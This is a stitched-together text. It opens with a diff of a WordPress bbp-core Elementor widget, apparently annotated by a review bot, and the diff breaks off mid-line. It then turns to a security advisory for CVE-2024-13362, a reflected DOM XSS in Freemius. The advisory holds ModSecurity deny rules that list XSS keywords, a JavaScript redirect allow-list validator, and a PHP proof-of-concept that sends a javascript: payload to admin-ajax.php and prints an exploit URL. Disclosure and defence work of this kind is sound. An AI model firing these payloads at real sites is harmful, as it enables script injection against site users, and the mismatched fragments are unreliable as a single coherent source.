+		$this->add_control(
+			'ppp2', [
+				'label'       => esc_html__( 'Show Forums', 'bbp-core' ),
+				'description' => esc_html__( 'Show the forums count at the initial view. Default is 9 forums in a row.', 'bbp-core' ),
+				'label_block' => true,
+				'default'     => 6
+			]
+		);
+
+		$this->add_control(
+			'order2', [
+				'label'   => esc_html__( 'Order', 'bbp-core' ),
+				'type'    => Controls_Manager::SELECT,
+				'options' => [
+					'ASC'  => 'ASC',
+					'DESC' => 'DESC'
+				],
+				'default' => 'ASC'
+			]
+		);
+
+        //==== View More Button
+        $this->add_control(
+            'more_txt2_heading', [
+                'label'       => esc_html__( 'View More Button', 'bbp-core' ),
+                'type'        => Controls_Manager::HEADING,
+                'separator'   => 'before',
+            ]
+        );
+
+        $this->add_control(
+            'is_topic_tab_btn', [
+                'label' => esc_html__( 'Button (Show/Hide)', 'bbp-core' ),
+                'type' => ElementorControls_Manager::SWITCHER,
+                'label_on' => esc_html__( 'Show', 'bbp-core' ),
+                'label_off' => esc_html__( 'Hide', 'bbp-core' ),
+                'return_value' => 'yes',
+                'default' => 'yes',
+            ]
+        );
+
+
+		$this->add_control(
+			'more_txt2', [
+				'label'       => esc_html__( 'Button Label', 'bbp-core' ),
+				'type'        => Controls_Manager::TEXT,
+				'label_block' => true,
+				'default'     => esc_html__('View More', 'bbp-core'),
+                'condition'   => [
+                    'is_topic_tab_btn' => 'yes'
+                ]
+			]
+		);
+
+		$this->add_control(
+			'more_url2', [
+				'label'       => esc_html__( 'Button URL', 'bbp-core' ),
+				'type'        => ElementorControls_Manager::URL,
+				'default'     => [
+					'url'         => get_post_type_archive_link( 'topic' ),
+					'is_external' => true,
+					'nofollow'    => true,
+				],
+                'condition'   => [
+                    'is_topic_tab_btn' => 'yes'
+                ]
+			]
+		);
+
+		$this->end_controls_section(); //End Topic Filter Options
+
+
+        //===================== Forum Tab Title ======================//
+		$this->start_controls_section(
+			'forum_tab_style', [
+				'label' => __( 'Forum Tab Title', 'bbp-core' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+
+
+		$this->add_group_control(
+			ElementorGroup_Control_Typography::get_type(),
+			[
+				'name'     => 'forum_tab_title',
+				'label'    => __( 'Tab Label Typography', 'bbp-core' ),
+				'selector' => '{{WRAPPER}} .community-area .nav-tabs .nav-item button',
+			]
+		);
+
+		$this->add_control(
+			'forum_tab_title_color',
+			[
+				'label'     => __( 'Tab Label Color', 'bbp-core' ),
+				'type'      => ElementorControls_Manager::COLOR,
+				'selectors' => [
+					'{{WRAPPER}} .community-area .nav-tabs .nav-item button' => 'color: {{VALUE}}',
+				],
+			]
+		);
+
+		$this->end_controls_section();
+
+
+		$this->start_controls_section(
+			'forum_tab_button', [
+				'label' => esc_html__( 'Forum Tab Button', 'bbp-core' ),
+				'tab'   => Controls_Manager::TAB_STYLE,
+			]
+		);
+
+		$this->add_responsive_control(
+			'tab_btn_margin', [
+				'label'      => esc_html__( 'Margin', 'bbp-core' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => [ 'px', '%', 'em' ],
+				'selectors'  => [
+					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'margin: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->add_responsive_control(
+			'tab_btn_padding', [
+				'label'      => esc_html__( 'Tab button padding', 'bbp-core' ),
+				'type'       => Controls_Manager::DIMENSIONS,
+				'size_units' => [ 'px', '%', 'em' ],
+				'selectors'  => [
+					'{{WRAPPER}} .tab-content .show-more-btn.show-more-round' => 'padding: {{TOP}}{{UNIT}} {{RIGHT}}{{UNIT}} {{BOTTOM}}{{UNIT}} {{LEFT}}{{UNIT}};',
+				],
+			]
+		);
+
+		$this->end_controls_section();
+	}
+
+	protected function render() {
+		$settings = $this->get_settings();
+
+		$forums = new WP_Query( array(
+			'post_type'      => 'forum',
+			'posts_per_page' => ! empty( $settings['ppp'] ) ? $settings['ppp'] : 9,
+			'order'          => $settings['order'],
+		) );
+
+		$topics = new WP_Query( array(
+			'post_type'      => 'topic',
+			'posts_per_page' => ! empty( $settings['ppp2'] ) ? $settings['ppp2'] : 9,
+			'order'          => $settings['order'],
+		) );
+
+		include( "inc/forum/forum_tab.php" );
+	}
 }
 No newline at end of file
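Review bot: `render()` still builds both queries from `$settings['order']`, so the `order2` control in the Topic Filter Options section never reaches the `$topics` query; the second `WP_Query` should read `'order' => $settings['order2']`. The `ppp` and `ppp2` controls also still have no `'type'` (the Forum_Ajax widget declares `ElementorControls_Manager::NUMBER` for the same setting) and their raw values go into `posts_per_page` without `absint()`, so a non-numeric value reaches `WP_Query` unchanged. Style: the two empty lines directly after `register_controls(): void` and the 4-space indentation of the new View More Button blocks inside a tab-indented method.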
--- a/bbp-core/includes/Elementor/Forum_posts.php
+++ b/bbp-core/includes/Elementor/Forum_posts.php
@@ -1,143 +1,143 @@
-<?php
-
-namespace adminElementor;
-
-use ElementorWidget_Base;
-use ElementorControls_Manager;
-use ElementorGroup_Control_Typography;
-use ElementorGroup_Control_Text_Shadow;
-use WP_Query;
-use WP_Post;
-
-// Exit if accessed directly
-if ( ! defined( 'ABSPATH' ) ) {
-	exit;
-}
-
-/**
- * Class Forum_posts
- *
- * @package amaCoreWidgets
- */
-class Forum_posts extends Widget_Base {
-
-	public function get_name() {
-		return 'ama_forum_posts';
-	}
-
-	public function get_title() {
-		return __( 'BBPC Forum Topics', 'bbp-core' );
-	}
-
-	public function get_icon() {
-		return 'bbpc_icon_ama_forum_posts';
-	}
-
-	public function get_keywords() {
-		return [ 'topics', 'replies' ];
-	}
-
-	// style dependency
-	public function get_style_depends() {
-		return [ 'bbpc-el-widgets' ];
-	}
-
-	public function get_categories() {
-		return [ 'bbp-core' ];
-	}
-
-	protected function register_controls() {
-
-		// --- Filter Options
-		$this->start_controls_section(
-			'filter_opt', [
-				'label' => __( 'Filter Options', 'bbp-core' ),
-			]
-		);
-
-		$this->add_control(
-			'ppp', [
-				'label'       => esc_html__( 'Show Forum Topics', 'bbp-core' ),
-				'type'        => Controls_Manager::NUMBER,
-				'default'     => 5
-			]
-		);
-
-		$this->add_control(
-			'order', [
-				'label'   => esc_html__( 'Order', 'bbp-core' ),
-				'type'    => Controls_Manager::SELECT,
-				'options' => [
-					'ASC'  => 'ASC',
-					'DESC' => 'DESC'
-				],
-				'default' => 'ASC'
-			]
-		);
-
-		$this->end_controls_section();
-		// end Document Setting Section
-	}
-
-	protected function render() {
-		$settings    = $this->get_settings();
-		$forum_posts = new WP_Query( array(
-			'post_type'      => 'topic',
-			'posts_per_page' => ! empty( $settings['ppp'] ) ? $settings['ppp'] : - 1,
-			'order'          => $settings['order'] ? $s
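
Review bot: the hunk is cut off after `'order'          => $settings['order'] ? $s` on this page, so only the removed side of `Forum_posts.php` is visible and the replacement cannot be reviewed here. In the part that is shown, the `posts_per_page` fallback `! empty( $settings['ppp'] ) ? $settings['ppp'] : - 1` loads every topic whenever the control is left empty; falling back to the control's own default of `5` keeps the query bounded. The `ElementorGroup_Control_Typography`, `ElementorGroup_Control_Text_Shadow` and `WP_Post` imports are not referenced anywhere in the visible class and can go.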

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity
SecRule REQUEST_URI "@streq /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter in AJAX',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_POST:action "@streq fs_connect" "chain"
    SecRule ARGS_POST:url "@rx (?:javascript|data|vbscript|alert|onerror|onload|onclick|prompt|eval)" "t:lowercase,t:urlDecode,chain"
      SecRule ARGS_POST:url "@rx [<>'\(]" "t:lowercase,t:urlDecode"

SecRule REQUEST_URI "@rx ^/wp-admin/admin.php" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS_GET:url "@rx ^javascript:" "t:lowercase,t:urlDecode"

SecRule REQUEST_URI "@rx ^/wp-json/freemius/v\d+/" 
  "id:20261996,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 - Freemius XSS via url parameter in REST',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx (?:javascript|data|vbscript):" "t:lowercase,t:urlDecode"
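The rules above deny-list three URI schemes at the edge. The durable fix for a `url` parameter that ends up in a DOM sink such as document.location is an allow-list check at the sink itself. This is an added illustration, not Freemius or Atomic Edge code; the origin is passed in explicitly (a browser would use window.location.origin) and the fallback path /wp-admin/ is an assumption.

```javascript
// Added example (not Freemius or Atomic Edge code): allow-list validation of a
// redirect target read from a `url` query parameter before it reaches a DOM sink.
// The WAF rules deny-list javascript:, data: and vbscript:; at the sink an
// allow-list is safer, because the URL parser normalises case and encoding and
// anything that is not an http(s) URL on the expected origin is rejected.

const SAFE_PROTOCOLS = new Set(['http:', 'https:']);

// Returns the normalised absolute URL if `candidate` is an http(s) URL on
// `origin` (e.g. 'https://example.com'), otherwise null. `origin` is a parameter
// so the function also runs outside a browser.
function safeRedirectTarget(candidate, origin) {
  if (typeof candidate !== 'string') return null;
  let parsed;
  try {
    // Relative paths such as "/wp-admin/" resolve against the expected origin;
    // an absolute URL with its own scheme ignores the base.
    parsed = new URL(candidate, origin);
  } catch (e) {
    return null; // unparseable input is never a valid redirect target
  }
  if (!SAFE_PROTOCOLS.has(parsed.protocol)) return null; // javascript:, data:, ...
  if (parsed.origin !== origin) return null;             // open redirect to elsewhere
  return parsed.href;
}

// Mirrors the shape of a checkout/opt-in redirect handler: read `url` from the
// query string, validate it, then hand the target to the navigation sink.
// `navigate` stands in for `document.location = target` (assumed hypothetical).
// Returns true when the requested target was accepted, false when it fell back.
function redirectFromQuery(search, origin, navigate) {
  const raw = new URLSearchParams(search).get('url');
  const target = safeRedirectTarget(raw, origin);
  if (target === null) {
    navigate(origin + '/wp-admin/'); // assumed safe default, not from the page
    return false;
  }
  navigate(target);
  return true;
}
```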

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC
<?php
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

/**
 * Proof of Concept for CVE-2024-13362
 * Demonstrates reflected XSS via the 'url' parameter in Freemius checkout flow.
 *
 * Requirements: PHP with cURL extension
 * Usage: php exploit.php
 */

// Target WordPress site (modify this)
$target_url = 'http://example.com';

// Malicious XSS payload - this will execute in the browser context
$xss_payload = 'javascript:alert("Atomic Edge XSS PoC - CVE-2024-13362")';

// Craft the exploit URL
$exploit_url = $target_url . '/wp-admin/admin-ajax.php';
$params = [
    'action' => 'fs_connect',
    'url'    => $xss_payload
];

// Initialize cURL session
echo "[+] Sending exploit request to target: {$target_url}\n";

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $exploit_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($params));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_TIMEOUT, 10);

$response  = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

// Check if the payload was reflected
echo "[+] HTTP Response Code: {$http_code}\n";
echo "[+] Response length: " . strlen((string) $response) . " bytes\n";

if ($response !== false && strpos($response, $xss_payload) !== false) {
    echo "[!] VULNERABLE: XSS payload reflected in response\n";
    echo "[!] Proof: {$exploit_url}?url=" . urlencode($xss_payload) . "\n";
} else {
    echo "[-] Target may be patched or unreachable\n";
}

// Alternative: Craft a direct link for manual testing
echo "\n[+] Alternative manual test URL:\n";
echo "{$target_url}/wp-admin/?page=freemius-checkout&url=" . urlencode('javascript:alert("XSS")');
echo "\n\n[+] To test in browser, click the link above or craft as HTML href\n";
